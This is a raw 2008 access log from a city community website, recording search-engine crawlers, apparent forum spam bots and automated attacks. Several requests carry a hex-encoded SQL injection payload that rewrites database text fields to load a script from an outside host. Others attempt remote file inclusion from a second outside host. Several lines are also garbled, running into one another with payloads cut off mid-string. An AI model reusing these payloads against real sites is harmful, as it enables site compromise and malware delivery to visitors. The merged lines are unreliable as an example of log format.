208.115.111.242 - - [28/Aug/2008:06:59:17 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&automodule=blog HTTP/1.1" 200 5493 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:06:59:32 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&showforum=10 HTTP/1.1" 200 8433 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:06:59:40 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&showforum=11 HTTP/1.1" 200 8232 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:06:59:47 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&showforum=12 HTTP/1.1" 200 6445 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
78.157.143.211 - - [28/Aug/2008:06:59:50 -0700] "GET /jodera2/posting.php?mode=reply&t=737 HTTP/1.0" 302 0 "http://gold-collection.biz" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.5) Gecko/20050207 Firefox/1.0.1" "www.sancarloscity.org"
78.157.143.211 - - [28/Aug/2008:06:59:51 -0700] "GET /jodera2/login.php?redirect=posting.php&mode=reply&t=737&sid=e6c51e8a43097627ba19467c2b063d6a HTTP/1.0" 200 12361 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=737&sid=e6c51e8a43097627ba19467c2b063d6a" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.5) Gecko/20050207 Firefox/1.0.1" "www.sancarloscity.org"
78.157.143.211 - - [28/Aug/2008:06:59:52 -0700] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=737&sid=e6c51e8a43097627ba19467c2b063d6a" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.5) Gecko/20050207 Firefox/1.0.1" "www.sancarloscity.org"
78.157.143.211 - - [28/Aug/2008:06:59:53 -0700] "GET /jodera2/posting.php?mode=reply&t=737&sid=e6c51e8a43097627ba19467c2b063d6a HTTP/1.0" 200 51515 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=737&sid=e6c51e8a43097627ba19467c2b063d6a" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.5) Gecko/20050207 Firefox/1.0.1" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:06:59:53 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&showforum=13 HTTP/1.1" 200 6057 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:59:58 -0700] "GET /classifieds/index.php?method=showhtmllist&list=classifiedscategory&rollid=41&clearoff=1 HTTP/1.0" 200 5697 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
78.157.143.211 - - [28/Aug/2008:06:59:58 -0700] "POST /jodera2/posting.php HTTP/1.0" 200 11446 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=737&sid=e6c51e8a43097627ba19467c2b063d6a" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.5) Gecko/20050207 Firefox/1.0.1" "www.sancarloscity.org"
78.157.143.211 - - [28/Aug/2008:07:00:01 -0700] "GET /jodera2/viewtopic.php?p=1676 HTTP/1.0" 200 57735 "http://www.sancarloscity.org/viewtopic.php?p=1676#1676" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.5) Gecko/20050207 Firefox/1.0.1" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:07:00:02 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&showforum=14 HTTP/1.1" 200 3079 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
91.77.225.153 - - [28/Aug/2008:07:00:09 -0700] "GET /forum2/index.php HTTP/1.0" 200 37335 "http://www.sancarloscity.org/forum2/index.php" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:07:00:09 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&showforum=15 HTTP/1.1" 200 6739 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
91.77.225.153 - - [28/Aug/2008:07:00:11 -0700] "GET /forum2/index.php?s=4c6928c7447882b1f56092d121e2bd40&act=Reg&CODE=00&coppa_pass=1 HTTP/1.0" 200 10146 "http://www.sancarloscity.org/forum2/index.php?s=4c6928c7447882b1f56092d121e2bd40&act=Reg&CODE=00&coppa_pass=1" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2" "www.sancarloscity.org"
91.77.225.153 - - [28/Aug/2008:07:00:12 -0700] "POST /forum2/index.php?act=Reg&coppa_user=0&termsread=1&coppa_pass=1 HTTP/1.0" 200 19269 "http://www.sancarloscity.org/forum2/index.php?s=4c6928c7447882b1f56092d121e2bd40&act=Reg&CODE=00&coppa_pass=1" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2" "www.sancarloscity.org"
91.77.225.153 - - [28/Aug/2008:07:00:14 -0700] "GET /forum2/index.php?act=Reg&CODE=image&rc=f8f085e038c5890f693737607c864a21 HTTP/1.0" 200 4056 "http://www.sancarloscity.org/forum2/index.php?s=4c6928c7447882b1f56092d121e2bd40&act=Reg&CODE=00&coppa_pass=1" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2" "www.sancarloscity.org"
91.77.225.153 - - [28/Aug/2008:07:00:15 -0700] "POST /forum2/index.php HTTP/1.0" 200 19627 "http://www.sancarloscity.org/forum2/index.php?s=4c6928c7447882b1f56092d121e2bd40&act=Reg&CODE=00&coppa_pass=1" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:07:00:15 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&showforum=16 HTTP/1.1" 200 6733 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
91.77.225.153 - - [28/Aug/2008:07:00:16 -0700] "GET /forum2/index.php?act=Reg&CODE=image&rc=ba28a980dd7316d7881aabb2ca8a52e9 HTTP/1.0" 200 4539 "http://www.sancarloscity.org/forum2/index.php?s=4c6928c7447882b1f56092d121e2bd40&act=Reg&CODE=00&coppa_pass=1" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2" "www.sancarloscity.org"
91.77.225.153 - - [28/Aug/2008:07:00:17 -0700] "POST /forum2/index.php HTTP/1.0" 200 19627 "http://www.sancarloscity.org/forum2/index.php?s=4c6928c7447882b1f56092d121e2bd40&act=Reg&CODE=00&coppa_pass=1" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2" "www.sancarloscity.org"
91.77.225.153 - - [28/Aug/2008:07:00:18 -0700] "GET /forum2/index.php?s=4c6928c7447882b1f56092d121e2bd40&act=Reg&CODE=00&coppa_pass=1 HTTP/1.0" 200 10146 "http://www.sancarloscity.org/forum2/index.php?s=4c6928c7447882b1f56092d121e2bd40&act=Reg&CODE=00&coppa_pass=1" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2" "www.sancarloscity.org"
91.77.225.153 - - [28/Aug/2008:07:00:20 -0700] "GET /forum2/index.php?act=Reg&CODE=image&rc=d3f110daf3f80b306478e5e2a0e6cdc7 HTTP/1.0" 200 3849 "http://www.sancarloscity.org/forum2/index.php?s=4c6928c7447882b1f56092d121e2bd40&act=Reg&CODE=00&coppa_pass=1" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2" "www.sancarloscity.org"
91.77.225.153 - - [28/Aug/2008:07:00:20 -0700] "POST /forum2/index.php HTTP/1.0" 200 19627 "http://www.sancarloscity.org/forum2/index.php?s=4c6928c7447882b1f56092d121e2bd40&act=Reg&CODE=00&coppa_pass=1" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:07:00:21 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&showforum=17 HTTP/1.1" 200 5260 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
91.77.225.153 - - [28/Aug/2008:07:00:22 -0700] "GET /forum2/index.php?s=4c6928c7447882b1f56092d121e2bd40&act=Reg&CODE=00&coppa_pass=1 HTTP/1.0" 200 10146 "http://www.sancarloscity.org/forum2/index.php?s=4c6928c7447882b1f56092d121e2bd40&act=Reg&CODE=00&coppa_pass=1" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2" "www.sancarloscity.org"
91.77.225.153 - - [28/Aug/2008:07:00:23 -0700] "GET /forum2/index.php?act=Reg&CODE=image&rc=b9ad2270118fc247810179a04a6c1967 HTTP/1.0" 200 4355 "http://www.sancarloscity.org/forum2/index.php?s=4c6928c7447882b1f56092d121e2bd40&act=Reg&CODE=00&coppa_pass=1" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2" "www.sancarloscity.org"
91.77.225.153 - - [28/Aug/2008:07:00:24 -0700] "POST /forum2/index.php HTTP/1.0" 200 19627 "http://www.sancarloscity.org/forum2/index.php?s=4c6928c7447882b1f56092d121e2bd40&act=Reg&CODE=00&coppa_pass=1" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:07:00:25 -0700] "GET /classifieds/index.php?method=showdetails&list=advertisement&rollid=74&fromfromlist=advertisement_active&fromfrommethod=showhtmllist HTTP/1.0" 200 5769 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:07:01:01 -0700] "GET /picgallery/displayimage.php?album=lastup&cat=7&pos=4 HTTP/1.0" 200 13136 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
114.241.12.184 - - [28/Aug/2008:07:01:12 -0700] "GET /logs/access_080204.log?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D2077lajornadanet/us1:190.5.174.6.18.251 - - [28/Aug/2008:07:01:27 -0700] "GET /classifieds/index.php?method=showdetails&list=advertisement&rollid=244&fromfromlist=advertisement_active&fromfrommethod=showhtmllist HTTP/1.0" 200 6053 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:07:02:39 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&showforum=3 HTTP/1.1" 200 3338 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:07:02:49 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&showforum=4 HTTP/1.1" 200 6875 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:07:02:58 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&showforum=5 HTTP/1.1" 200 6096 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:07:03:06 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&showforum=7 HTTP/1.1" 200 5885 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:07:03:15 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&showforum=8 HTTP/1.1" 200 3955 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:07:03:17 -0700] "GET /logs/access_071030.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:07:03:22 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&showforum=9 HTTP/1.1" 200 10091 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
200.63.42.95 - - [28/Aug/2008:07:03:24 -0700] "GET /jodera2/index.php HTTP/1.0" 200 61584 "http://www.sancarloscity.org/jodera2/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1" "www.sancarloscity.org"
200.63.42.95 - - [28/Aug/2008:07:03:27 -0700] "GET /jodera2/viewforum.php?f=1&sid=bdead8ab5bf4239da46d45212636a7d1 HTTP/1.0" 200 83526 "http://www.sancarloscity.org/viewforum.php?f=1&sid=bdead8ab5bf4239da46d45212636a7d1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1" "www.sancarloscity.org"
200.63.42.93 - - [28/Aug/2008:07:03:29 -0700] "GET /jodera2/index.php HTTP/1.0" 200 61585 "http://www.sancarloscity.org/jodera2/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.2; .NET CLR 1.1.4322; yplus 4.4.02b)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:07:03:30 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&showtopic=111&view=getlastpost HTTP/1.1" 302 5 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:07:03:37 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&showtopic=111&view=getnewpost HTTP/1.1" 302 5 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
200.63.42.95 - - [28/Aug/2008:07:03:37 -0700] "GET /jodera2/login.php HTTP/1.0" 200 12333 "http://www.sancarloscity.org/login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1" "www.sancarloscity.org"
200.63.42.95 - - [28/Aug/2008:07:03:38 -0700] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1" "www.sancarloscity.org"
200.63.42.95 - - [28/Aug/2008:07:03:39 -0700] "GET /jodera2/index.php?sid=bdead8ab5bf4239da46d45212636a7d1 HTTP/1.0" 200 55011 "http://www.sancarloscity.org/jodera2/index.php?sid=bdead8ab5bf4239da46d45212636a7d1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1" "www.sancarloscity.org"
65.55.212.188 - - [28/Aug/2008:07:03:42 -0700] "GET /robots.txt HTTP/1.0" 200 44 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.sancarloscity.org"
65.55.212.188 - - [28/Aug/2008:07:03:42 -0700] "GET /forum/profile.php?mode=register HTTP/1.0" 404 737 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.sancarloscity.org"
200.63.42.95 - - [28/Aug/2008:07:03:43 -0700] "GET /jodera2/viewforum.php?f=1 HTTP/1.0" 200 83912 "http://www.sancarloscity.org/viewforum.php?f=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:07:03:44 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&showtopic=112&view=getlastpost HTTP/1.1" 302 5 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
200.63.42.93 - - [28/Aug/2008:07:03:44 -0700] "GET /jodera2/viewforum.php?f=1&sid=a09bd2bdae15da46b84cb2621a72d7f7 HTTP/1.0" 200 83526 "http://www.sancarloscity.org/viewforum.php?f=1&sid=a09bd2bdae15da46b84cb2621a72d7f7" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.2; .NET CLR 1.1.4322; yplus 4.4.02b)" "www.sancarloscity.org"
200.63.42.95 - - [28/Aug/2008:07:03:45 -0700] "GET /jodera2/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 41358 "http://www.sancarloscity.org/posting.php?mode=newtopic&f=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:07:03:51 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&showtopic=112&view=getnewpost HTTP/1.1" 302 5 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
200.63.42.95 - - [28/Aug/2008:07:03:53 -0700] "POST /jodera2/posting.php HTTP/1.0" 200 11432 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1" "www.sancarloscity.org"
200.63.42.93 - - [28/Aug/2008:07:03:53 -0700] "GET /jodera2/login.php HTTP/1.0" 200 12333 "http://www.sancarloscity.org/login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.2; .NET CLR 1.1.4322; yplus 4.4.02b)" "www.sancarloscity.org"
200.63.42.93 - - [28/Aug/2008:07:03:55 -0700] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.2; .NET CLR 1.1.4322; yplus 4.4.02b)" "www.sancarloscity.org"
200.63.42.93 - - [28/Aug/2008:07:03:59 -0700] "GET /jodera2/index.php?sid=a09bd2bdae15da46b84cb2621a72d7f7 HTTP/1.0" 200 55067 "http://www.sancarloscity.org/jodera2/index.php?sid=a09bd2bdae15da46b84cb2621a72d7f7" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.2; .NET CLR 1.1.4322; yplus 4.4.02b)" "www.sancarloscity.org"
200.63.42.93 - - [28/Aug/2008:07:04:04 -0700] "GET /jodera2/viewforum.php?f=1 HTTP/1.0" 200 83888 "http://www.sancarloscity.org/viewforum.php?f=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.2; .NET CLR 1.1.4322; yplus 4.4.02b)" "www.sancarloscity.org"
200.63.42.93 - - [28/Aug/2008:07:04:10 -0700] "GET /jodera2/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 41358 "http://www.sancarloscity.org/posting.php?mode=newtopic&f=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.2; .NET CLR 1.1.4322; yplus 4.4.02b)" "www.sancarloscity.org"
200.63.42.93 - - [28/Aug/2008:07:04:20 -0700] "POST /jodera2/posting.php HTTP/1.0" 200 11432 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.2; .NET CLR 1.1.4322; yplus 4.4.02b)" "www.sancarloscity.org"
78.161.146.225 - - [28/Aug/2008:07:05:16 -0700] "GET /logs/access_080131.log?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D2077dbsbible/us1:24.97.214.1208.115.111.242 - - [28/Aug/2008:07:05:27 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&showtopic=147&view=getlastpost HTTP/1.1" 302 5 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:07:05:42 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&showtopic=147&view=getnewpost HTTP/1.1" 302 5 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
219.28.197.102 - - [28/Aug/2008:07:05:43 -0700] "GET /logs/access_070920.log?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D2077tickets34746/us1:208.27.219.28.197.102 - - [28/Aug/2008:07:05:45 -0700] "GET /logs/access_070920.log?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776staugnavarre/us1:77.97.274.6.18.251 - - [28/Aug/2008:07:05:47 -0700] "GET /robots.txt HTTP/1.0" 200 44 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:07:05:48 -0700] "GET /classifieds/index.php?method=showdetails&list=advertisement&rollid=265&fromfromlist=advertisement_active&fromfrommethod=showhtmllist HTTP/1.0" 200 5967 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:07:05:49 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&showtopic=170&view=getlastpost HTTP/1.1" 302 5 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:07:05:56 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&showtopic=170&view=getnewpost HTTP/1.1" 302 5 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
69.72.161.10 - - [28/Aug/2008:07:05:57 -0700] "GET /logs/errors.php?error=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 764 "-" "libwww-perl/5.811" "www.sancarloscity.org"
69.72.161.10 - - [28/Aug/2008:07:05:57 -0700] "GET /errors.php?error=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 759 "-" "libwww-perl/5.811" "www.sancarloscity.org"
69.72.161.10 - - [28/Aug/2008:07:05:58 -0700] "GET /logs/access_080811.log/errors.php?error=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 769 "-" "libwww-perl/5.811" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:07:06:02 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&showtopic=174&view=getlastpost HTTP/1.1" 302 5 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:07:06:04 -0700] "GET /classifieds/index.php?method=showdetails&list=advertisement&rollid=79&fromfromlist=advertisement_active&fromfrommethod=showhtmllist HTTP/1.0" 200 5768 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:07:06:07 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&showtopic=174&view=getnewpost HTTP/1.1" 302 5 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
